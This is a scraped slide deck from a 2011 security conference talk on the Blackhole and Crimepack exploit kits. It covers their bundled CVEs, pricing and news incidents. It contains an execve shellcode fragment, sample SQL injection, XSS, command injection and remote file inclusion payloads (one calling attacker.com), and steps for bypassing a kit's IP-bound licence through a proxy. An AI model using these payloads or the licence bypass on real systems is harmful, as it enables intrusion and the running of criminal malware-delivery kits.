Exploit the Exploit Kits (Dhruv Soi)

3,040
-1

Published on

ClubHack 2011 Hacking and Security Conference.
Talk - Exploit the Exploit Kits
Speaker - Dhruv Soi

Published in: Technology, News & Politics
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,040
On Slideshare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
81
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Exploit the Exploit Kits (Dhruv Soi)

  1. 1. Exploit The Exploit Kits Presented By: Dhruv Soi Chief Mentor @ Hacker Distinct Objects Director @ Torrid Networks Chair @OWASP Indiahttp://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  2. 2. Disclaimerhttp://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  3. 3. Agenda  #whoami  Segmentation Fault  #./exploit –mode Basics  AAAAAAAAAAAAAAAAAAAAAAAAAAAAA  #history; lastlog  ummm  #watch ‘demo –kits blackhole crimepack’  Boom!  #make –bypass License  Oops!  #shutdown -r now “Questions?“  Thank Youhttp://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  4. 4. http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  5. 5. Who am I?  Chief Mentor – HDO, Founder – Torrid Networks, Chair – OWASP India  Past Experience – Fidelity Investments, Tech Mahindra (iPolicy), Sopra Group, FCS  Speaker – NASSCOM, DSCI, CII, OWASP India, OWASP Taiwan, OWASP Portugal  Author – Linux For You, Benefit, IT Magazine, HNS, SearchSecurity  Organizer for OWASP Asia 2009 – Director - NTRO, CBI Director, US – White House Cyber Czar, Ex-CIA Director invited as Chief Guest  OWASP 2012 – Be Ready!  Expertise – None. Only passionate about InfoSec, just another learner!http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  6. 6. Basics of Exploitationhttp://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  7. 7. Art of Exploitationhttp://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  8. 8. Vulnerability to Exploitation 8http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  9. 9. Practical Exploitationhttp://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  10. 10. Software Vulnerabilities @ Glance  Buffer Overflow global code_start global code_end  .data Format String code_start: jmp 0x17  Code/File Injection popl %esi movl %esi,0x8(%esi) xorl %eax,%eax  Privilege Escalation movb %eax,0x7(%esi) movl %eax,0xc(%esi) my_execve:  Denial of Service movb $0xb,%al movl %esi,%ebx leal 0x8(%esi),%ecx xorl %edx,%edx int $0x80 call -0x1c .string "/bin/shX" code_end: 10http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  11. 11. Application Vulnerabilities @ Glance  SQL Injection  ‘ OR 1=1--  Cross Site Scripting  <script>alert(“Hello”)</script>  File Inclusion  /index.php?page=http://www.attacker.com/attack.txt  Command Injection  /lookup.php|dir c:  Session Hijack  .  . 11http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  12. 12. Traditional Attack Scenario Identify Target Port Scan Vulnerability Identification Exploit Privilege Elevation Access Resources Replicate to other targets (worms) 12http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  13. 13. Attack Challenges  Identifying a user not on internet (public/static IP address)?  LAN Users  Attacking a user behind Firewall  Network Firewalls  Host based Firewalls  Patched Machines, Latest Exploits (0-Days)  Antivirus  Too much manual work - Time is money! 13http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  14. 14. From Servers to Client  Identify user from social networks, search engines, emails, address book, logs or behavior  Target Client Side Attacks  Browser based (Mozilla, IE, Safari, etc.)  Adobe Reader  Adobe Flash  Sun Java  Media Players  User needs to click the URL pointing to hosted exploit  Send Email  Insert to his favorite website 14http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  15. 15. Client Side Vulnerabilities - Metasploit  Microsoft Windows WebDAV Application DLL Hijacker  Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution  Microsoft Windows Shell LNK Code Execution (MS10-046)  Microsoft Help Center XSS and Command Execution (MS10-042)  Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)  Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)  Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)  FireFox 3.5 escape Return Value Memory CorruptionAdobe PDF Embedded EXE Social Engineering  Firefox location.QueryInterface() Code Execution  Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution  Mozilla Suite/Firefox Navigator Object Code Execution  Adobe Collab.getIcon() Buffer Overflow  Adobe Collab.collectEmailInfo() Buffer Overflow  Adobe Flash Player "newfunction" Invalid Pointer Use  Adobe Flash Player "Button" Remote Code Execution  Sun Java Calendar Deserialization Exploit  Sun Java JRE getSoundbank file:// URI Buffer Overflow  Sun Java JRE AWT setDiffICM Buffer Overflow  Too many exploits, too lesser time! 15http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  16. 16. 16http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  17. 17. Java Rhino CVE-2011-3544 : Java Applet Rhino Script Engine Remote Code Execution 17http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  18. 18. 18http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  19. 19. 19http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  20. 20. Demonstration Time… 20http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  21. 21. Source: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino 21http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  22. 22. 22http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  23. 23. Exploit Kits  PHP, Mysql, List of Exploits, Obfuscated Code  Centralized Console – Dashboards  Generates iFrame  Sends exploits automatically to the victim browser on visiting the website (iFrame)  Pushes the payload (Bot, Trojan, Keylogger) to the victim’s machine on successful exploitation  Records the stats  OOPS! Antivirus Evasion, Scanning  All Automated – Sometimes its good to be lazy! 23http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  24. 24. Blackhole & Crimepack 24http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  25. 25. Blackhole Exploits  Internet Explorer  CVE-2010-1885 HCP  CVE-2006-0003 IE MDAC  Adobe Software  CVE-2008-2992 Adobe Reader util.printf  CVE-2009-0927 Adobe Reader Collab GetIcon  CVE-2007-5659 Adobe Reader CollectEmailInfo  Java Software  CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in deploytk.dll  CVE-2010-0840 Java trusted Methods Chaining Remote Code Execution Vulnerability  CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability  CVE-2010-0886 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE  CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin 25http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  26. 26. Crimepack Exploits  name="mdac"  name="aol"  desc="IE6 COM CreateObject Code  desc="AOL Radio AmpX Buffer Execution" CVE-2006-0003 Overflow" CVE-2007-5755  name="msiemc"  name="iexml"  desc="IE7 Uninitialized Memory  desc="Internet Explorer 7 XML Exploit" Corruption" CVE-2010-0806 CVE-2008-4844  name="java"  name="firefoxdiffer"  desc="JRE getSoundBank Stack BOF"  desc="Firefox 3.5/1.4/1.5 exploits" CVE- CVE-2009-3867 2009-355  name="iepeers"  name="libtiff"  desc="IEPeers Remote Code Execution"  desc="Adobe Acrobat LibTIFF Integer CVE-2010-0806 Overflow" CVE-2010-0188  name="pdfexpl"  name="spreadsheet"  desc="PDF Exploits [collectEmailInfo  desc="OWC Spreadsheet Memory (CVE-2007-5659), getIcon (CVE-2009- Corruption" CVE-2009-1136 0927), util.printf (CVE-2008-2992)]"  name="activexbundle"  name="opera"  desc="Bundle of ActiveX exploits" CVE-  desc="Opera TN3270" CVE-2009-3269 2008-2463 26http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  27. 27. 27http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  28. 28. Crimepack 28http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  29. 29. Blackhole, hick hick! 29http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  30. 30. Whew! Demonstration Time... 30http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  31. 31. Exploit Kits in News  November 2, 2011: Blackhole Exploit Kit attack on WampServer & Wordpress sites  October 13, 2011: Approximately 16,000 compromised pages are redirecting users to the site thats hosting the Nice Pack exploit kit  September 27, 2011: MySQL.com hacked to serve malware  May 17, 2011: Geek.com Site Hacked Via Blackhole Exploit Kit  April 11, 2011: US Postal Service (USPS.gov) website victim of Blackhole exploit kit  May 05, 2010: U.S. Treasury Website Hacked Using Exploit Kit 31http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  32. 32. There are just too many of those…. 32http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  33. 33. Data Leakage, Even Exploit Kits!  May 22, 2011: First Public Release of BlackHole Exploit Kit!  May 14, 2011: Crimepack 3.1.3 Exploit kit Leaked, available for Download!  May 13, 2011: 26 Underground Hacking Exploit Kit available for Download!  April 14, 2011: Phoenix exploit kit 2.5 leaked, Download Now! 33http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  34. 34. Managed Hacking Services  Blackhole Deal – Am ain’t their marketing guy!  Annual license: $ 1500  Half-year license: $ 1000  3-month license: $ 700  Update FUD $ 50  Changing domain $ 20 multidomain $ 200 to license.  During the term of the license all the updates are free.  Rent on Blackhole servers: • 1 week (7 full days): $ 200 • 2 weeks (14 full days): $ 300 • 3 weeks (21 full day): $ 400 • 4 weeks (31 full day): $ 500 • 24-hour test: $ 50 34http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  35. 35. Obfuscated Code… 35http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  36. 36. Bypass License  License is bound to IP (Public IP – IP1), kit checks for the IP from the HTTP headers and grants access  How about configuring your server with the IP address on which Kit is built upon? – Routing issues?  Configure owned public IP - eth0 (IP2), configure exploit kits public IP - eth1 (IP1)  Configure Apache VirtualHost IP1:80 with exploit kit path  Configure Apache VirtualHost IP2:80 with mod_proxy module  Configure Apache mod_proxy to forward the request from IP2:80  IP1:80  Kit thinks its license is in use since the request are coming to IP1 36http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  37. 37. Protecting from Exploit Kits? Out of Scope for now! 37http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  38. 38. We are hiring! Malware Writers Exploit Writers Onsite InfoSec Trainers Opportunity in South Africa 38http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  39. 39. Questions? SANTA 39http://hacker.do © Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×